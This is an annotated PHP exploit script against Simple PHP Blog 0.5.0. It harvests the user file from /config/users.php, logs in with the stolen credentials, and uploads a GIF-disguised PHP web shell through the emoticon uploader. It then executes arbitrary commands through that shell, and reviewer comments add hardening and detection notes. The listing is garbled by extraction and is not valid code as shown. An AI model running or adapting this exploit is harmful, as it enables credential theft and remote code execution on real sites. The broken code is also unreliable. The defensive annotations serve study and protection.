
Simple PHP Blog (SPHPBlog)

<?/*sIMPLEphpbLOG0.5.0eXPLOITbYmAXzA2008*/functioncurl($url,$postvar){global$cook;$ch=curl_init($url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,1);

/*

sIMPLE php bLOG 0.5.0 eXPLOIT

bY mAXzA 2008

*/

/*
 * curl(): the single HTTP helper used for every request in this script.
 *
 * $url     - full request URL; also sent back as the Referer header.
 * $postvar - request body handed to CURLOPT_POSTFIELDS. A value shorter than
 *            3 characters is replaced by the filler "123", so a body is
 *            always attached to the request.
 * Returns the raw response with the HTTP headers included (CURLOPT_HEADER),
 * which is why callers below can search it for "Set-Cookie:".
 *
 * Session state lives in the global $cook: once it holds more than 3
 * characters it is sent as the Cookie header on every later request.
 * No timeout, redirect or TLS option is set in this function.
 */
function curl($url,$postvar){

global $cook;

$ch = curl_init( $url );

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_HEADER, 1);

curl_setopt ($ch, CURLOPT_REFERER,"$url");

if (strlen($postvar)<3) $postvar="123";

curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);

if (strlen($cook)>3)

curl_setopt ($ch, CURLOPT_COOKIE, "$cook");

// Transport errors are only printed; the (possibly empty) response is still returned.
$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "


$err
";

curl_close($ch);

return $res;

// End of curl(). error($msg) follows on the same line: it prints $msg plus
// the fixed text "Not Exploitable" and terminates the script with exit.
} function error($msg){

print "


$msg
n

Not Exploitable";exit;

// End of error(). The top-level script starts on the same line.
// NOTE(review): extract() on $_POST and $_GET turns every request parameter
// into a variable of the same name. $url and $eval used further down come
// from here, and a requester can equally pre-set $cook, $user or $pass.
// NOTE(review): the print strings in this listing look like they lost their
// markup and escape backslashes during extraction; what the "URL:" string
// originally rendered cannot be told from here.
} extract($_POST);extract($_GET); print "

URL:
";

// Overview (defender's reading). The script chains two weaknesses it assumes
// in the target named in the header comment:
//   1. /config/users.php is returned over HTTP as pipe-delimited text, and
//   2. /emoticons.php accepts an upload that ends up as a .php file under
//      /images/emoticons/, where the web server executes it.
// Hardening that breaks the chain: keep credential files outside the web root
// or deny HTTP access to the config directory, restrict uploads to an
// allow-list of image types checked server-side, and disable script execution
// in upload directories.
// NOTE(review): this listing is damaged by extraction (escape backslashes,
// some operators and the markup inside strings are missing), so it is not
// valid PHP as shown.

// Command branch: taken when the request carries $eval longer than 3
// characters. The value is sent as POST field "z" to the uploaded file, the
// response is cut at the first "GIF89a", and everything after a further 41
// characters is printed before the script exits.
// Detection: any request to a .php path under /images/emoticons/, in
// particular a POST carrying a field named z.
if (strlen($eval)>3){

$eval=stripslashes($eval);

print "nEnter PHP Command:n";

print "

";

$res=curl("$url/images/emoticons/sphp.php","z=$eval");

$res=strstr($res,"GIF89a");

print substr($res,41);exit;

// Main branch: runs only when $url is longer than 10 characters.
} if (strlen($url)>10)

{

// Step 1: request /config/users.php. A "|" anywhere in the response is
// treated as proof that the user records were disclosed; otherwise error()
// ends the run.
// Detection: direct requests for /config/users.php in the access log.
print "n


Trying to Get /config/users.php...";flush();

$res=curl($url."/config/users.php","");

if (strstr($res,'|')) print "Done!nn$res";

// Step 2: normalise line endings, skip past the response headers and split
// the body into one record per line. The count is reduced by one,
// presumably to ignore a trailing empty line.
else error("nnUsername & Password Not Foundnn$res"); print "n


Trying to Get Username & Password...";flush();

$res=str_replace("rn","n",$res);

$res=substr($res,strpos($res,"nn") 2);

$line=explode("n",$res);$n=count($line)-1;

if ($n) {

print "nDone! Found - $n users:n";

// Each record is split on "|": field 1 is kept as the user name and only the
// first two characters of field 2 are kept as the value later sent as "pass".
// The full field 2 is printed. Why a two-character value would be accepted
// is not visible in this file.
for ($x=0;$x<$n;$x ){

$up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);

print "nUsername - ".$up[1]."tPassword - ".$up[2];

}

// Step 3: log in as the first record only (index 0) through /login_cgi.php
// and lift the session id out of the response headers. Offset 12 skips the
// literal "Set-Cookie: ", so $cook ends up as "sid=..." up to the first ";".
} print "n


Trying to Login...";flush();

$postvar="user=$user[0]&pass=$pass[0]&";

$res=curl($url."/login_cgi.php","$postvar");

$cook=strstr($res,'Set-Cookie: sid=');

$cook=substr($cook,12,strpos($cook,';')-12);

// Step 4: build the upload. $buf is base64 data written to a local sphp.php
// unless a file of exactly 82 bytes already exists there.
// NOTE(review): judging by the "GIF89a" search in the command branch and the
// "z" field used in step 5, the decoded file presumably starts with a GIF
// header followed by PHP code that evaluates POST field z; the base64 string
// itself appears damaged in this listing.
// Defensive point: a magic-byte check alone would accept such a file, so the
// upload handler must also constrain the stored extension and location.
if ($cook) print "nnDone... Cookie - $cook";else error("n

Error To Login

nnn$res"); print "n
Trying to Upload Emoticon...";flush();

$buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8 Ow==";

if (@filesize('sphp.php')!=82){

$f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);

}

// The local file is submitted as form field "user_emot" to /emoticons.php
// with the session cookie from step 3; success is judged by the text
// "Success!" in the response.
// Detection: a POST to /emoticons.php followed by requests to a new .php
// file under /images/emoticons/, and any .php file present in that directory.
$f=getcwd()."/sphp.php";

$res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));

// Step 5: confirm execution by sending a statement that prints the marker
// 20080824 and looking for that marker in the response.
if (strstr($res,"Success!")) print "nnDone! Exploit path - $url/images/emoticons/sphp.php"; else error("n

Error To Upload

nnn$res"); print "n
Trying to Exploit...";flush();

$res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");

// Step 6: end the session through /logout.php. The uploaded file is not
// removed by anything in this script, so it stays on the server afterwards.
if (strstr($res,"20080824")) print "nnDone! Exploit Working!"; else error("n

Error To Exploit

nnn$res"); print "n
Trying to Logout...";flush();

$res=curl($url."/logout.php","");

if (strstr($res,"You are now logged out")) print "nnDone!"; else error("n

Error To Logout

nnn$res");

print "nEnter PHP Command:n";

}

print "";

?>
